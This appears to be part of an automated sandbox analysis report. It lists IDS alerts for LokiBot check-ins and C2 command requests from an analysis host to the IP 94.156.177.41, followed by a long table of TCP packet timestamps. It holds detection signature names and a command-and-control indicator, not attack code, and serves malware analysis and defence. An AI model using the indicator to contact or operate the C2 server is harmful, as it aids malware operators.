2025-01-11T08:38:54.273813+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:54.273813+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:54.273813+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:54.976683+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:55.134435+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:55.134435+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:55.134435+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:55.873721+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:56.036472+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:56.036472+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:56.036472+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:56.740058+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:56.987645+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:56.987645+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:56.987645+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:57.718537+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:57.870196+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:57.870196+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:57.870196+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:58.557574+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:58.710492+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:38:58.710492+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:38:58.710492+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:38:59.435116+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:38:59.655514+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:38:59.655514+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:38:59.655514+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:39:00.362103+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:39:00.512250+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:00.512250+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:00.512250+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:01.205421+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:01.365444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:01.365444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:01.365444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:02.212934+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:02.473916+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:02.473916+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:02.473916+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:03.191625+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:03.353242+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:03.353242+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:03.353242+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:04.061459+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:04.211638+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:04.211638+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:04.211638+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:04.924708+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:05.111899+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:05.111899+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:05.111899+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:05.834626+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:06.002182+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:06.002182+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:06.002182+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:06.824285+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:06.979552+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:06.979552+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:06.979552+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:07.710239+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:07.899333+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:07.899333+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:07.899333+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:08.598891+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:08.814632+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:08.814632+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:08.814632+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:09.507655+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:09.685224+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:09.685224+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:09.685224+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:10.394621+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:10.558443+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:10.558443+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:10.558443+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:11.312423+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:11.462948+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50105	94.156.177.41	80	TCP
2025-01-11T08:39:11.462948+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50105	94.156.177.41	80	TCP
2025-01-11T08:39:11.462948+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50105	94.156.177.41	80	TCP
2025-01-11T08:39:12.212304+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50105	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:37:17.271100044 CET	49804	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:17.275984049 CET	80	49804	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:17.276148081 CET	49804	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:17.278357029 CET	49804	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:17.283098936 CET	80	49804	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:17.283199072 CET	49804	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:17.288050890 CET	80	49804	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:17.995059967 CET	80	49804	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:17.995235920 CET	80	49804	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:17.995289087 CET	49804	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:17.995347023 CET	49804	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:18.000893116 CET	80	49804	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:18.584558010 CET	49811	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:18.589382887 CET	80	49811	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:18.589462996 CET	49811	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:18.591609955 CET	49811	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:18.596435070 CET	80	49811	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:18.596493006 CET	49811	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:18.601329088 CET	80	49811	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:19.336060047 CET	80	49811	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:19.336149931 CET	80	49811	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:19.336213112 CET	49811	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:19.336297989 CET	49811	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:19.341116905 CET	80	49811	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:19.418452978 CET	49817	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:19.423377037 CET	80	49817	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:19.423464060 CET	49817	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:19.425755978 CET	49817	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:19.430567026 CET	80	49817	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:19.430624962 CET	49817	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:19.435506105 CET	80	49817	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:20.138648987 CET	80	49817	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:20.138735056 CET	80	49817	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:20.138789892 CET	49817	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:20.138789892 CET	49817	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:20.143610001 CET	80	49817	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:20.282954931 CET	49828	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:20.287868977 CET	80	49828	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:20.288041115 CET	49828	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:20.290095091 CET	49828	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:20.294935942 CET	80	49828	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:20.295162916 CET	49828	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:20.299956083 CET	80	49828	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:21.015218019 CET	80	49828	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:21.015364885 CET	80	49828	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:21.015453100 CET	49828	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:21.015652895 CET	49828	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:21.020508051 CET	80	49828	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:21.321365118 CET	49834	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:21.326203108 CET	80	49834	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:21.326299906 CET	49834	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:21.328651905 CET	49834	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:21.333596945 CET	80	49834	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:21.333703041 CET	49834	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:21.338596106 CET	80	49834	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.060451984 CET	80	49834	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.060586929 CET	80	49834	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.060607910 CET	49834	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.060659885 CET	49834	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.065540075 CET	80	49834	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.204633951 CET	49841	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.209543943 CET	80	49841	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.209625006 CET	49841	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.212016106 CET	49841	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.216936111 CET	80	49841	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.217011929 CET	49841	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.221834898 CET	80	49841	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.934484959 CET	80	49841	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.934700012 CET	80	49841	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:22.934798956 CET	49841	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.934936047 CET	49841	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:22.939738989 CET	80	49841	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:23.086955070 CET	49848	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:23.091877937 CET	80	49848	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:23.092011929 CET	49848	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:23.097503901 CET	49848	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:23.102271080 CET	80	49848	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:23.102370977 CET	49848	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:23.107253075 CET	80	49848	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:23.790729046 CET	80	49848	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:23.790751934 CET	80	49848	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:23.790839911 CET	49848	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:23.793505907 CET	49848	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:23.798336029 CET	80	49848	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:24.110160112 CET	49854	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:24.115044117 CET	80	49854	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:24.115104914 CET	49854	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:24.117260933 CET	49854	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:24.122071981 CET	80	49854	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:24.122123003 CET	49854	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:24.126919985 CET	80	49854	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:24.849899054 CET	80	49854	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:24.850043058 CET	80	49854	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:24.850076914 CET	49854	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:24.850394011 CET	49854	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:24.854926109 CET	80	49854	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.015861988 CET	49864	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.020658970 CET	80	49864	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.020755053 CET	49864	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.022986889 CET	49864	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.027784109 CET	80	49864	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.027858019 CET	49864	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.032720089 CET	80	49864	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.749088049 CET	80	49864	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.749138117 CET	80	49864	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.749212980 CET	49864	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.754112005 CET	80	49864	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.888153076 CET	49870	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.893064022 CET	80	49870	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.893189907 CET	49870	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.895386934 CET	49870	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.900254965 CET	80	49870	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:25.900547981 CET	49870	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:25.905338049 CET	80	49870	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:26.588424921 CET	80	49870	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:26.588531017 CET	80	49870	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:26.588547945 CET	49870	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:26.588664055 CET	49870	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:26.593346119 CET	80	49870	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:26.753829002 CET	49876	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:26.758718014 CET	80	49876	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:26.758860111 CET	49876	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:26.761853933 CET	49876	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:26.766757011 CET	80	49876	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:26.766848087 CET	49876	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:26.771718025 CET	80	49876	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:27.478336096 CET	80	49876	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:27.478382111 CET	80	49876	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:27.478445053 CET	49876	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:27.478482008 CET	49876	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:27.483220100 CET	80	49876	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:27.631376028 CET	49882	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:27.636130095 CET	80	49882	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:27.636219025 CET	49882	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:27.639379025 CET	49882	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:27.644175053 CET	80	49882	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:27.644318104 CET	49882	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:27.649164915 CET	80	49882	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:28.381721020 CET	80	49882	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:28.381834984 CET	80	49882	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:28.381899118 CET	49882	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:28.381899118 CET	49882	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:28.386776924 CET	80	49882	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:28.539493084 CET	49888	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:28.544444084 CET	80	49888	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:28.544544935 CET	49888	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:28.546928883 CET	49888	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:28.555169106 CET	80	49888	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:28.555244923 CET	49888	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:28.560892105 CET	80	49888	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:29.254405975 CET	80	49888	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:29.254427910 CET	80	49888	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:29.254494905 CET	49888	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:29.254635096 CET	49888	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:29.259380102 CET	80	49888	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:29.415723085 CET	49895	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:29.420598030 CET	80	49895	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:29.420713902 CET	49895	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:29.422964096 CET	49895	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:29.427819967 CET	80	49895	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:29.427876949 CET	49895	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:29.432723045 CET	80	49895	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:30.159415960 CET	80	49895	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:30.159554958 CET	80	49895	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:30.159632921 CET	49895	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:30.159668922 CET	49895	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:30.164484024 CET	80	49895	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:30.308378935 CET	49904	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:30.313282013 CET	80	49904	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:30.313410044 CET	49904	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:30.316665888 CET	49904	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:30.321436882 CET	80	49904	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:30.321552992 CET	49904	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:30.326390982 CET	80	49904	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.068775892 CET	80	49904	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.068872929 CET	49904	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.068881989 CET	80	49904	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.068928957 CET	49904	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.073702097 CET	80	49904	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.231554985 CET	49911	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.236402988 CET	80	49911	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.236483097 CET	49911	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.238603115 CET	49911	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.243402958 CET	80	49911	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.243472099 CET	49911	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.248373985 CET	80	49911	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.960581064 CET	80	49911	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.960617065 CET	80	49911	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:31.960695982 CET	49911	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.960798979 CET	49911	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:31.965686083 CET	80	49911	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:32.118123055 CET	49917	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:32.123176098 CET	80	49917	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:32.125443935 CET	49917	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:32.127331018 CET	49917	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:32.132144928 CET	80	49917	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:32.132348061 CET	49917	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:32.137109995 CET	80	49917	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:32.876811028 CET	80	49917	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:32.876916885 CET	80	49917	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:32.876960039 CET	49917	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:32.876960039 CET	49917	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:32.881747007 CET	80	49917	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:33.022778034 CET	49923	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:37:33.027702093 CET	80	49923	94.156.177.41	192.168.2.9
Jan 11, 2025 08:37:33.027879000 CET	49923	80	192.168.2.9	94.156.177.41
